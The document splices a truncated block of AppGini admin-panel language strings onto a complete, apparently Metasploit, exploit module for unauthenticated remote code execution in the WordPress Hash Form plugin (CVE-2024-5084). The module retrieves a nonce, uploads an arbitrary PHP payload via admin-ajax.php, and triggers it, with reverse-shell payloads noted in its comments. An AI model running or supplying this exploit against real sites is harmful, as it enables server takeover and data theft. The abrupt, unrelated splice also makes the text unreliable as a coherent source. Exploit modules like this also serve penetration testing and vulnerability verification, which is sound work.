designed in AppGini to the actual database structure and allows you to fix any deviations.",<br /> "field": "Field",<br /> "AppGini definition": "AppGini definition",<br /> "database definition": "Current definition in the database",<br /> "table name title": "<TABLENAME> table",<br /> "does not exist": "Doesn't exist!",<br /> "create field": "Create the field by running an ADD COLUMN query.",<br /> "create it": "Create it",<br /> "fix field": "Fix the field by running an ALTER COLUMN query so that its definition becomes the same as that in AppGini.",<br /> "fix it": "Fix it",<br /> "field update warning": "DANGER!! In some cases, this might lead to data loss, truncation, or corruption. It might be a better idea sometimes to update the field in AppGini to match that in the database. Would you still like to continue?",<br /> "no deviations found": "No deviations found. All fields OK!",<br /> "error fields": "Found <CREATENUM> non-existing fields that need to be created.<br>Found <UPDATENUM> deviating fields that might need to be updated.",<br /> "thumbnails utility": "Use this utility if you have one or more image fields in a table that don't have thumbnails or have thumbnails with incorrect dimensions.",<br /> "rebuild thumbnails of table": "Rebuild thumbnails of table",<br /> "rebuild": "Rebuild",<br /> "rebuild thumbnails of table_name": "Rebuilding thumbnails of '<i><TABLENAME><\/i>' table ...",<br /> "do not close page message": "Don't close this page until you see a confirmation message that all thumbnails have been built.",<br /> "rebuild thumbnails status": "Status: still rebuilding thumbnails, please wait ...",<br /> "building field thumbnails": "Building thumbnails for '<i><FIELD><\/i>' field...",<br /> "done": "Done.",<br /> "finished status": "Status: finished. You can close this page now.",<br /> "invalid mail queue": "Invalid mail queue.",<br /> "sending message failed": " -- Sending message to '<EMAIL>': Failed.",<br /> "sending message ok": " -- Sending message to '<EMAIL>': Ok.",<br /> "done!": "Done!",<br /> "close page": "You may close this page now or browse to some other page.",<br /> "mail log": "Mail log:",<br /> "invalid security token": "Invalid security token! Please <a href=\"pageSettings.php\">reload the page<\/a> and try again.",<br /> "unique admin username error": "The new admin username is already taken by another member. Please make sure the new admin username is unique.",<br /> "unique anonymous username error": "The new anonymous username is already taken by another member. Please make sure the username provided is unique.",<br /> "unique anonymous group name error": "The new anonymous group name is already in use by another group. Please make sure the group name provided is unique.",<br /> "admin password mismatch": "\"Admin password\" and \"Confirm password\" don't match.",<br /> "invalid sender email": "Invalid \"Sender email\".",<br /> "errors occurred": "The following errors occurred:",<br /> "go back": "Please <a href=\"pageSettings.php\" onclick=\"history.go(-1); return false;\">go back<\/a> to correct the above error(s) and try again.",<br /> "record updated automatically": "Record updated automatically on <DATE>",<br /> "admin settings saved": "Admin settings saved successfully.<br>Back to <a href=\"pageSettings.php\">Admin settings<\/a>.",<br /> "admin settings not saved": "Admin settings were NOT saved successfully. Failure reason: <ERROR><br>Back to <a href=\"pageSettings.php\" onclick=\"history.go(-1); return false;\">Admin settings<\/a>.",<br /> "admin username": "Admin username",<br /> "admin password": "Admin password",<br /> "change admin password": "Type a password only if you want to change the admin password.",<br /> "sender email": "Sender email",<br /> "sender name and email": "Sender name and email are used in the 'To' field when sending",<br /> "email messages": "email messages to groups or members.",<br /> "admin notifications": "Admin notifications",<br /> "no email notifications": "No email notifications to admin.",<br /> "member waiting approval": "Notify admin only when a new member is waiting for approval.",<br /> "new sign-ups": "Notify admin for all new sign-ups.",<br /> "sender name": "Sender name",<br /> "members custom field 1": "Members custom field 1",<br /> "members custom field 2": "Members custom field 2",<br /> "members custom field 3": "Members custom field 3",<br /> "members custom field 4": "Members custom field 4",<br /> "member approval email subject": "Member approval<br>email subject",<br /> "member approval email subject control": "When the admin approves a member, the member is notified by<br>email that he is approved. You can control the subject of the<br>approval email in this box, and the content in the box below.",<br /> "member approval email message": "Member approval<br>email message",<br /> "MySQL date": "MySQL date<br>formatting string",<br /> "MySQL reference": "Please refer to <a href=\"https:\/\/dev.mysql.com\/doc\/refman\/5.0\/en\/date-and-time-functions.html#function_date-format\" target=\"_blank\">the MySQL reference<\/a> for possible formats.",<br /> "PHP short date": "PHP short date<br>formatting string",<br /> "PHP manual": "Please refer to <a href=\"https:\/\/www.php.net\/manual\/en\/function.date.php\" target=\"_blank\">the PHP manual<\/a> for possible formats.",<br /> "PHP long date": "PHP long date<br>formatting string",<br /> "groups per page": "Groups per page",<br /> "members per page": "Members per page",<br /> "records per page": "Records per page",<br /> "default sign-up mode": "Default sign-up mode<br>for new groups",<br /> "no sign-up allowed": "No sign-up allowed. Only the admin can add members.",<br /> "admin approve members": "Sign-up allowed, but the admin must approve members.",<br /> "automatically approve members": "Sign-up allowed, and automatically approve members.",<br /> "anonymous group": "Name of the anonymous<br>group",<br /> "anonymous user name": "Name of the anonymous<br>user",<br /> "hide twitter feed": "Hide Twitter feed in admin homepage?",<br /> "twitter feed": "Our Twitter feed helps keep you informed of our latest news, useful resources, new releases, and many other helpful tips.",<br /> "invalid source member": "Invalid source member selected.",<br /> "invalid destination member": "Invalid destination member selected.",<br /> "moving member": "Moving member '<MEMBERID>' and his data from group '<SOURCEGROUP>' to group '<DESTINATIONGROUP>' ...",<br /> "data records transferred": "Member '<MEMBERID>' now belongs to group '<NEWGROUP>'. Data records transferred: <DATARECORDS>.",<br /> "moving data": "Moving data of member '<SOURCEMEMBER>' from group '<SOURCEGROUP>' to member '<DESTINATIONMEMBER>' from group '<DESTINATIONGROUP>' ...",<br /> "member records status": "Member '<SOURCEMEMBER>' of group '<SOURCEGROUP>' had <DATABEFORE> data records. <TRANSFERSTATUS> to member '<DESTINATIONMEMBER>' of group '<DESTINATIONGROUP>'.",<br /> "moving all group members": "Moving all members and data of group '<SOURCEGROUP>' to group '<DESTINATIONGROUP>' ...",<br /> "failed transferring group members": "Operation failed. No members were transferred from group '<SOURCEGROUP>' to '<DESTINATIONGROUP>'.",<br /> "group members transferred": "All members of group '<SOURCEGROUP>' now belong to '<DESTINATIONGROUP>'. ",<br /> "failed transfer data records": "However, data records failed to transfer.",<br /> "data records were transferred": "<DATABEFORE> data records were transferred.",<br /> "moving group data to member": "Moving data of all members of group '<SOURCEGROUP>' to member '<DESTINATIONMEMBER>' from group '<DESTINATIONGROUP>' ...",<br /> "moving group data to member status": "<NUMBER> record(s) were transferred from group '<SOURCEGROUP>' to member '<DESTINATIONMEMBER>' of group '<DESTINATIONGROUP>'",<br /> "status": "STATUS:",<br /> "batch transfer link": "To repeat the same batch transfer again later you can <a href= \"pageTransferOwnership.php?sourceGroupID=<SOURCEGROUP>&sourceMemberID=<SOURCEMEMBER>&destinationGroupID=<DESTINATIONGROUP>&destinationMemberID=<DESTINATIONMEMBER>&moveMembers=<MOVEMEMBERS>\">bookmark or copy this link<\/a>.",<br /> "ownership batch transfer": "Batch Transfer Of Ownership",<br /> "step 1": "STEP 1:",<br /> "batch transfer wizard": "The batch transfer wizard allows you to transfer data records of one or all members of a group (the <i>source group<\/i>) to a member of another group (the <i>destination member<\/i> of the <i>destination group<\/i>)",<br /> "source group": "Source group",<br /> "update": "Update",<br /> "next step": "Next Step",<br /> "group statistics": "This group has <MEMBERS> members, and <RECORDS> data records.",<br /> "step 2": "STEP 2:",<br /> "source member message": "The source member could be one member or all members of the source group.",<br /> "source member": "Source member",<br /> "all group members": "All members of '<GROUPNAME>'",<br /> "member statistics": "This member has <RECORDS> data records.",<br /> "step 3": "STEP 3:",<br /> "destination group message": "The destination group could be the same or different from the source group. Only groups that have members are listed below.",<br /> "destination group": "Destination group",<br /> "step 4": "STEP 4:",<br /> "destination member message": "The destination member will be the new owner of the data records of the source member.",<br /> "destination member": "Destination member",<br /> "begin transfer": "Begin Transfer",<br /> "move records": "You could either move records from the source member(s) to a member in the destination group, or move the source member(s), together with their data records to the destination group.",<br /> "move data records to member": "Move data records to this member:",<br /> "move source member to group": "Move source member(s) and all his\/their data records to the '<GROUPNAME>' group.",<br /> "file not found error": "Error: File '<FILENAME>' not found.",<br /> "preview and confirm CSV data": "Preview and confirm CSV data",<br /> "display csv file rows": "Displaying the first 10 rows of the CSV file ...",<br /> "change CSV settings": "Change CSV settings",<br /> "import CSV data": "Confirm and import CSV data >",<br /> "apply CSV settings": "Apply CSV Settings",<br /> "importing CSV data": "Importing CSV data ...",<br /> "start at estimated record": "Starting at record <RECORDNUMBER> of <RECORDS> total estimated records ...",<br /> "table backed up": "Table '<TABLE>' backed up as '<TABLENAME>'.",<br /> "table backup not done": "Table '<TABLE>' is empty, so no backup was done.",<br /> "importing batch": "Importing batch <BATCH> of <BATCHNUM>: ",<br /> "ok": "Ok",<br /> "records inserted or updated successfully": "<RECORDS> records inserted\/updated in <SECONDS> seconds.",<br /> "mission accomplished": "Mission accomplished!",<br /> "assign a records owner": "Assign an owner to the imported records >",<br /> "please wait and do not close": "Please wait and don't close this page ...",<br /> "hide advanced options": "Hide advanced options",<br /> "show advanced options": "Show advanced options",<br /> "import CSV to database": "Import a CSV file to the database",<br /> "import CSV to database page": "This page allows you to upload a CSV file (for example, one generated from MS Excel) and import it to one of the tables of the database. This makes it so easy to bulk-populate the database with data from other sources rather than manually entering every single record.",<br /> "populate table from CSV": "This is the table that you want to populate with data from the CSV file.",<br /> "CSV file": "CSV file",<br /> "preview CSV data": "Preview CSV data >",<br /> "no table name provided": "No table name provided.",<br /> "can not open CSV": "Can't open csv file '<FILENAME>'.",<br /> "empty CSV file": "The csv file '<FILENAME>' is empty.",<br /> "no CSV file data": "The csv file '<FILENAME>' has no data to read.",<br /> "field separator": "Field separator",<br /> "default comma": "The default is comma (,)",<br /> "field delimiter": "Field delimiter",<br /> "default double-quote": "The default is double-quote (\")",<br /> "maximum characters per line": "Maximum characters per line",<br /> "trouble importing CSV": "If you have trouble importing the CSV file, try increasing this value.",<br /> "ignore lines number": "Number of lines to ignore",<br /> "skip lines number": "Change this value if you want to skip a specific number of lines in the CSV file.",<br /> "first line field names": "The first line of the file contains field names",<br /> "field names must match": "Field names must <b>exactly<\/b> match those in the database.",<br /> "update table records": "Update matching table records (using primary key).",<br /> "ignore CSV table records": "If not checked, records in the CSV file having the same primary key values as those in the table <b>will be ignored<\/b>",<br /> "back up the table": "Back up the table before importing CSV data into it.",<br /> "no matching results found": "No matching results found.",<br /> "search groups": "Search groups",<br /> "find": "Find",<br /> "reset": "Reset",<br /> "members count": "Members count",<br /> "Edit group": "Edit group",<br /> "confirm delete group": "Are you sure you want to completely delete this group?",<br /> "delete group": "Delete group",<br /> "view group records": "View group records",<br /> "view group members": "View group members",<br /> "send message to group": "Send message to group",<br /> "previous": "Previous",<br /> "displaying groups": "Displaying groups <GROUPNUM1> to <GROUPNUM2> of <GROUPS>",<br /> "next": "Next",<br /> "key": "Key:",<br /> "edit group details": "Edit group details and permissions.",<br /> "add member to group": "Add a new member to group.",<br /> "view data records": "View all data records entered by the group's members.",<br /> "list group members": "List all members of a group.",<br /> "send email to all members": "Send an email message to all members of a group.",<br /> "search members": "Search members <SEARCH> in <HTMLSELECT>",<br /> "all fields": "All fields",<br /> "any": "Any",<br /> "waiting approval": "Waiting approval",<br /> "active": "Active",<br /> "Banned": "Banned",<br /> "username": "Username",<br /> "sign up date": "Sign up date",<br /> "Status": "Status",<br /> "Edit member": "Edit member",<br /> "sure delete user": "Are you sure you want to delete user '<USERNAME>'?",<br /> "delete member": "Delete member",<br /> "approve this member": "Approve this member",<br /> "unban this member": "Unban this member",<br /> "ban this member": "Ban this member",<br /> "View member records": "View member's records",<br /> "send message to member": "Send message to member",<br /> "displaying members": "Displaying members <MEMBERNUM1> to <MEMBERNUM2> of <MEMBERS>",<br /> "activate member": "Activate new\/banned member.",<br /> "ban member": "Ban (suspend) member.",<br /> "view entered member records": "View all data records entered by member.",<br /> "send email to member": "Send an email message to member.",<br /> "data records": "Data Records",<br /> "show records": "Show records from",<br /> "all tables": "All tables",<br /> "sort records": "Sort records by",<br /> "date created": "Date created",<br /> "date modified": "Date modified",<br /> "newer first": "Newer first",<br /> "older first": "Older first",<br /> "created": "Created",<br /> "modified": "Modified",<br /> "data": "Data",<br /> "change record ownership": "Change ownership of this record",<br /> "sure delete record": "Are you sure you want to delete this record?",<br /> "delete record": "Delete record",<br /> "displaying records": "Displaying records <RECORDNUM1> to <RECORDNUM2> of <RECORDS>",<br /> "maintenance mode admin notification": "Maintenance mode is enabled! You can disable it from the admin home page.",<br /> "maintenance mode message": "Maintenance mode message",<br /> "maintenance mode": "Maintenance mode",<br /> "OFF": "OFF",<br /> "ON": "ON",<br /> "enable maintenance mode?": "Are you sure you want to enable maintenance mode? Only admin users can access the site in this mode!",<br /> "disable maintenance mode?": "Are you sure you want to disable maintenance mode? All users will be able to access the site!",<br /> "csv file upload error": "An error occurred while processing the requested CSV file.",<br /> "back and retry": "Go back and retry",<br /> "upload or choose csv file": "Upload a CSV file or open an existing one",<br /> "choose csv upload": "Choose a CSV file to upload",<br /> "no file chosen yet": "No file chosen yet",<br /> "start upload": "Start upload",<br /> "select a table": "Select a table",<br /> "error reading csv data": "An error occurred while reading CSV data. Try resetting\/adjusting the CSV settings.",<br /> "belongs to": "Belongs to",<br /> "skip column": "Skip this column",<br /> "connection failed retrying": "Connection failed. Retrying in <SECONDS> seconds ...",<br /> "connection failed timeout": "Connection timed out. Retry later.",<br /> "sure delete csv": "Are you sure you want to delete the CSV file [CSVFILE] from the server?",<br /> "invalid csv file selected": "Invalid file chosen. Must be a CSV file.",<br /> "couldnt delete csv file": "Couldn't delete this CSV file.",<br /> "error backing up table": "Error: Couldn't back up table <TABLE>.",<br /> "no columns selected": "Please select at least one column to import and make sure each selected column belongs to a UNIQUE field.",<br /> "csrf token expired or invalid": "Oops! Something went wrong with this page. Please go back and retry.",<br /> "back to groups": "Back to groups",<br /> "member updated": "Member <USERNAME> updated successfully",<br /> "fix errors before submitting": "Please fix the highlighted errors before submitting the page!",<br /> "mail_function": "Method of sending emails",<br /> "smtp_server": "SMTP server",<br /> "smtp_encryption": "SMTP encryption",<br /> "smtp_port": "SMTP port",<br /> "smtp_port_hint": "Typical values are 25 (for non-encrypted SMTP), 465 (used in many cases with SSL encryption) or 587 (typical with TLS encryption)",<br /> "smtp_user": "SMTP username",<br /> "smtp_pass": "SMTP password",<br /> "configure mail settings": "Configure mail settings",<br /> "display debugging info": "Display debugging info",<br /> "debugging info hint": "Debugging info is useful if you are having trouble sending emails through the configured SMTP server",<br /> "create backup file": "Create Backup File",<br /> "database backups": "Database backups",<br /> "no backups found": "No backups found. You can create a new backup by clicking the \"Create Backup File\" button.",<br /> "available backups": "Available backups",<br /> "restore backup": "Restore",<br /> "delete backup": "Delete",<br /> "backup restored": "Backup restored successfully.",<br /> "backup deleted": "Backup deleted successfully.",<br /> "restore error": "An error occurred while restoring backup.",<br /> "backup delete error": "An error occurred while deleting backup.",<br /> "confirm delete backup": "Are you sure you want to delete this backup file?",<br /> "confirm restore": "Restoring your database from a backup file would OVERWRITE all existing data AND users\/passwords, reverting all to the state when the backup was taken.\\n\\nDuring the restore process, maintenance mode will be enabled to prevent users from modifying the database, and will be disabled once the restore is finished.\\n\\nAre you sure you want to continue?",<br /> "confirm backup": "During the backup process, maintenance mode will be enabled to prevent users from modifying the database, and will be disabled once the backup is finished.\\n\\nAre you sure you want to continue?",<br /> "cant create backup folder": "Error: Can't create or write to admin\/backups folder. Please check your folder permissions and ownership or contact your server administrator for help.",<br /> "fix all": "FIX ALL FIELDS",<br /> "backup before fix": "It's highly recommended that you create a database backup first before attempting to make any fixes here.",<br /> "about backups": "Backups are performed using mysqldump commandline tool. If no backups are being created, it could be due to the web server not having permission to run mysqldump.",<br /> "server status disabled": "Server status is disabled on this application. To enable it, regenerate the application with the option \"Allow server status in admin area\" turned on.",<br /> "server status": "Server status",<br /> "db status": "Database status",<br /> "generated by": "This application was generated by AppGini <VERSION> on <DATETIME>.",<br /> "column table name": "Table name",<br /> "db storage": "Database storage",<br /> "column size kb": "Size (KB)",<br /> "total": "Total",<br /> "php info": "PHP info",<br /> "files": "files",<br /> "uploads info": "Uploads info",<br /> "quick search": "Quick Search",<br /> "records x to y of z": "Records <FirstRecord> to <LastRecord> of <RecordCount>",<br /> "filters": "Filters",<br /> "filter": "Filter",<br /> "filtered field": "Filtered field",<br /> "comparison operator": "Comparison Operator",<br /> "comparison value": "Comparison Value",<br /> "and": "And",<br /> "or": "Or",<br /> "equal to": "Equal to",<br /> "not equal to": "Not equal to",<br /> "greater than": "Greater than",<br /> "greater than or equal to": "Greater than or equal to",<br /> "less than": "Less than",<br /> "less than or equal to": "Less than or equal to",<br /> "like": "Like",<br /> "not like": "Not like",<br /> "is empty": "Is empty",<br /> "is not empty": "Is not empty",<br /> "apply filters": "Apply filters",<br /> "save filters": "Save and apply filters",<br /> "saved filters title": "HTML Code For The Applied Filters",<br /> "saved filters instructions": "Copy the code below and paste it to an HTML file to save the filter you just defined so that you can return to it at any time in the future without having to redefine it. You can save this HTML code on your computer or on any server and access this prefiltered table view through it.",<br /> "hide code": "Hide this code",<br /> "printer friendly view": "Printer-friendly view",<br /> "save as csv": "Download as csv file (comma-separated values)",<br /> "edit filters": "Edit filters",<br /> "clear filters": "Clear filters",<br /> "order by": "Order by",<br /> "go to page": "Go to page:",<br /> "none": "None",<br /> "Select all records": "Select all records",<br /> "With selected records": "With selected records",<br /> "Print Preview Detail View": "Print Preview Detail View",<br /> "Print Preview Table View": "Print Preview Table View",<br /> "Print": "Print",<br /> "Cancel Printing": "Cancel Printing",<br /> "Cancel Selection": "Cancel Selection",<br /> "Maximum records allowed to enable this feature is": "Maximum records allowed to enable this feature is",<br /> "No matches found!": "No matches found!",<br /> "Start typing to get suggestions": "Start typing to get suggestions.",<br /> "are you sure?": "Are you sure you want to delete this record?",<br /> "add new record": "Add new record",<br /> "update record": "Update record",<br /> "deselect record": "Deselect record",<br /> "couldn't delete": "Could not delete the record due to the presence of <RelatedRecords> related record(s) in table [<TableName>]",<br /> "confirm delete": "This record has <RelatedRecords> related record(s) in table [<TableName>]. Do you still want to delete it? <Delete> &nbsp; <Cancel>",<br /> "yes": "Yes",<br /> "pkfield empty": " field is a primary key field and cannot be empty.",<br /> "upload image": "Upload new file ",<br /> "select image": "Select an image ",<br /> "remove image": "Remove file",<br /> "month names": "January,February,March,April,May,June,July,August,September,October,November,December",<br /> "field not null": "You cannot leave this field empty.",<br /> "*": "*",<br /> "today": "Today",<br /> "Hold CTRL key to select multiple items from the above list.": "Hold CTRL key to select multiple items from the above list.",<br /> "Save New": "Save New",<br /> "Save As Copy": "Save As Copy",<br /> "Deselect": "Cancel",<br /> "Add New": "Add New",<br /> "Delete": "Delete",<br /> "Cancel": "Cancel",<br /> "Print Preview": "Print Preview",<br /> "Save Changes": "Save Changes",<br /> "CSV": "Save CSV",<br /> "Reset Filters": "Show All",<br /> "Find It": "Find It",<br /> "Previous": "Previous",<br /> "Next": "Next",<br /> "Back": "Back",<br /> "homepage": "Homepage",<br /> "error:": "Error:",<br /> "sql error:": "SQL error:",<br /> "query:": "Query:",<br /> "< back": "Back",<br /> "if you haven't set up": "If you haven't set up the database yet, you can do so by clicking <a href='setup.php'>here<\/a>.",<br /> "file too large": "Error: The file you uploaded exceeds the maximum allowed size of <MaxSize> KB",<br /> "invalid file type": "Error: This file type is not allowed. Only <FileTypes> files can be uploaded",<br /> "goto start page": "Back to start page",<br /> "no db connection": "Couldn't establish a database connection.",<br /> "no db name": "Couldn't access the database named '<DBName>' on this server.",<br /> "provide connection data": "Please provide the following data to connect to the database:",<br /> "mysql server": "MySQL server (host)",<br /> "mysql username": "MySQL Username",<br /> "mysql password": "MySQL password",<br /> "mysql db": "Database name",<br /> "connect": "Connect",<br /> "setup performed": "Setup already performed on",<br /> "delete md5": "If you want to force setup to run again, you should first delete the file 'setup.md5' from this folder.",<br /> "table exists": "Table <b><TableName><\/b> exists, containing <NumRecords> records.",<br /> "failed": "Failed",<br /> "mysql said": "MySQL said:",<br /> "table uptodate": "Table is up-to-date.",<br /> "couldnt count": "Couldn't count records of table <b><TableName><\/b>",<br /> "creating table": "Creating table <b><TableName><\/b> ... ",<br /> "tableAccessDenied": "Sorry! You don't have permission to access this table. Please contact the admin.",<br /> "not signed in": "You are not signed in",<br /> "sign in": "Sign In",<br /> "signed as": "Signed in as",<br /> "admin setup needed": "Admin setup was not performed. Please log in to the <a href=admin\/>admin control panel<\/a> to perform the setup.",<br /> "db setup needed": "Program setup was not performed yet. Please log in to the <a href=setup.php>setup page<\/a> first.",<br /> "new record saved": "The new record has been saved successfully.",<br /> "record updated": "The changes have been saved successfully.",<br /> "login failed": "Your previous login attempt failed. Try again.",<br /> "sign in here": "Sign In Here",<br /> "remember me": "Remember me",<br /> "go to signup": "Don't have a username? <br>&nbsp; <a href=membership_signup.php>Sign up here<\/a>",<br /> "forgot password": "Forgot your password? <a href=membership_passwordReset.php>Click here<\/a>",<br /> "browse as guest": "<a href=index.php>Continue browsing as a guest<\/a>",<br /> "no table access": "You don't have enough permissions to access any page here. Please sign in first.",<br /> "signup": "Sign up",<br /> "user already exists": "Username '<MemberID>' already exists. Try another username.",<br /> "user available": "Username '<MemberID>' is available and you can take it.",<br /> "empty user": "Please type a username in the box first then click 'Check availability'.",<br /> "thanks": "Thank you for signing up!",<br /> "sign in no approval": "If you have chosen a group that doesn't require admin approval, you can sign in right now <a href=index.php?signIn=1>here<\/a>.",<br /> "sign in wait approval": "If you have chosen a group that requires admin approval, please wait for an email confirming your approval.",<br /> "username empty": "You must provide a username. Please go back and type a username",<br /> "password invalid": "You must provide a password of 4 characters or more, without spaces. Please go back and type a valid password",<br /> "password no match": "Password doesn't match. Please go back and correct the password",<br /> "username exists": "Username already exists. Please go back and choose a different username.",<br /> "email invalid": "Invalid email address. Please go back and correct your email address.",<br /> "group invalid": "Invalid group. Please go back and correct the group selection.",<br /> "sign up here": "Sign Up Here!",<br /> "registered? sign in": "Already registered? <a href=index.php?signIn=1>Sign in here<\/a>.",<br /> "sign up disabled": "Sorry! Sign-up is temporarily disabled by admin. Try again later.",<br /> "groups *": "If you choose to sign up to a group marked with an asterisk (*), you won't be able to log in until the admin approves you. You'll receive an email when you are approved.",<br /> "sign up": "Sign Up",<br /> "password reset": "Password Reset Page",<br /> "password reset details": "Enter your username or email address below. We'll then send a special link to your email. After you click on that link, you'll be asked to enter a new password.",<br /> "password reset subject": "Password reset instructions",<br /> "password reset message": "Dear member, \n If you have requested to reset\/change your password, please click on this link: \n <ResetLink> \n\n If you didn't request a password reset\/change, please ignore this message. \n\n Regards.",<br /> "password reset ready": "An email with password reset instructions has been sent to your registered email address. Please follow the instructions in that email message.<br><br>If you don't receive this email within 5 minutes, try resetting your password again, and make sure you enter a correct username or email address.",<br /> "password reset invalid": "Invalid username or password. <a href=membership_passwordReset.php>Try again<\/a>, or go <a href=index.php>back to homepage<\/a>.",<br /> "password change": "Password Change Page",<br /> "new password": "New password",<br /> "password reset done": "Your password was changed successfully. You can <a href=index.php?signOut=1>log in with the new password here<\/a>.",<br /> "Loading ...": "Loading ...",<br /> "No records found": "No records found",<br /> "You can add children records after saving the main record first": "You can add child records after saving the main record first",<br /> "ascending": "Ascending",<br /> "descending": "Descending",<br /> "then by": "Then by",<br /> "Legend": "Legend",<br /> "Table": "Table",<br /> "Edit": "Edit",<br /> "View": "View",<br /> "Only your own records": "Only your own records",<br /> "All records owned by your group": "All records owned by your group",<br /> "All records": "All records",<br /> "Not allowed": "Not allowed",<br /> "Your info": "Your info",<br /> "Hello user": "Hello %s!",<br /> "Your access permissions&qu
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Payload::Php<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'WordPress Hash Form Plugin RCE',<br /> 'Description' => %q{<br /> The Hash Form – Drag & Drop Form Builder plugin for WordPress suffers from a critical vulnerability<br /> due to missing file type validation in the file_upload_action function. This vulnerability exists<br /> in all versions up to and including 1.1.0. Unauthenticated attackers can exploit this flaw to upload arbitrary<br /> files, including PHP scripts, to the server, potentially allowing for remote code execution on the affected<br /> WordPress site. This module targets multiple platforms by adapting payload delivery and execution based on the<br /> server environment.<br /> },<br /> 'Author' => [<br /> 'Francesco Carlucci', # Vulnerability discovery<br /> 'Valentin Lobstein' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2024-5084'],<br /> ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form/hash-form-drag-drop-form-builder-110-unauthenticated-arbitrary-file-upload-to-remote-code-execution'],<br /> ],<br /> 'Platform' => ['php', 'unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory', {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP<br /> # tested with php/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Unix/Linux Command Shell', {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows Command Shell', {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/windows/http/x64/meterpreter/reverse_tcp<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2024-05-23',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?<br /><br /> plugin_check_code = check_plugin_version_from_readme('hash-form', '1.1.1')<br /><br /> if plugin_check_code.code == CheckCode::Unknown.code<br /> return CheckCode::Unknown('Hash Form plugin does not appear to be installed.')<br /> end<br /><br /> return CheckCode::Detected('Hash Form plugin is installed but the version is unknown.') if plugin_check_code.code == CheckCode::Detected.code<br /><br /> plugin_version = plugin_check_code.details[:version]<br /> return CheckCode::Safe("Hash Form plugin is version: #{plugin_version}, which is not vulnerable.") unless plugin_check_code.code == CheckCode::Appears.code<br /><br /> print_good("Detected Hash Form plugin version: #{plugin_version}")<br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> print_status('Attempting to retrieve nonce from the target...')<br /> nonce = get_nonce<br /><br /> fail_with(Failure::NoTarget, 'Failed to retrieve the nonce necessary for file upload. The target may not be vulnerable or the Hash Form plugin might not be active.') unless nonce<br /><br /> print_good("Nonce retrieved: #{nonce}")<br /> print_status('Uploading PHP payload using the retrieved nonce...')<br /><br /> file_url = upload_php_file(nonce)<br /> fail_with(Failure::UnexpectedReply, 'Failed to upload the PHP payload. Check file permissions and server settings.') unless file_url<br /><br /> print_good("PHP payload uploaded successfully to #{file_url}")<br /> trigger_payload(file_url)<br /> end<br /><br /> def get_nonce<br /> uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri,<br /> 'vars_get' => {<br /> 'action' => 'hashform_preview',<br /> 'form' => 1<br /> }<br /> })<br /><br /> return nil unless res && res.code == 200<br /><br /> script_content = res.get_html_document.xpath('//script[@id="frontend-js-extra"]').text<br /> return nil unless script_content<br /><br /> nonce_match = script_content.match(/"ajax_nounce":"([a-f0-9]+)"/)<br /> nonce_match ? nonce_match[1] : nil<br /> end<br /><br /> def php_exec_cmd(encoded_payload)<br /> dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))<br /> encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)<br /><br /> shell = <<-END_OF_PHP_CODE<br /> #{php_preamble(disabled_varname: dis)}<br /> $c = base64_decode("#{encoded_clean_payload}");<br /> #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}<br /> END_OF_PHP_CODE<br /><br /> return Rex::Text.compress(shell)<br /> end<br /><br /> def upload_php_file(nonce)<br /> file_content = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)<br /> file_name = "#{Rex::Text.rand_text_alpha_lower(8)}.php"<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),<br /> 'ctype' => 'application/octet-stream',<br /> 'vars_get' => {<br /> 'action' => 'hashform_file_upload_action',<br /> 'file_uploader_nonce' => nonce,<br /> 'allowedExtensions[0]' => 'php',<br /> 'sizeLimit' => 1048576,<br /> 'qqfile' => file_name<br /> },<br /> 'data' => file_content<br /> })<br /><br /> if res && res.code == 200<br /> json_response = res.get_json_document<br /> return json_response['url'] if json_response && json_response['url']<br /> end<br /> nil<br /> end<br /><br /> def trigger_payload(url)<br /> print_status('Triggering the payload...')<br /> uri = URI.parse(url)<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri.path<br /> })<br /> end<br />end<br /></code></pre>
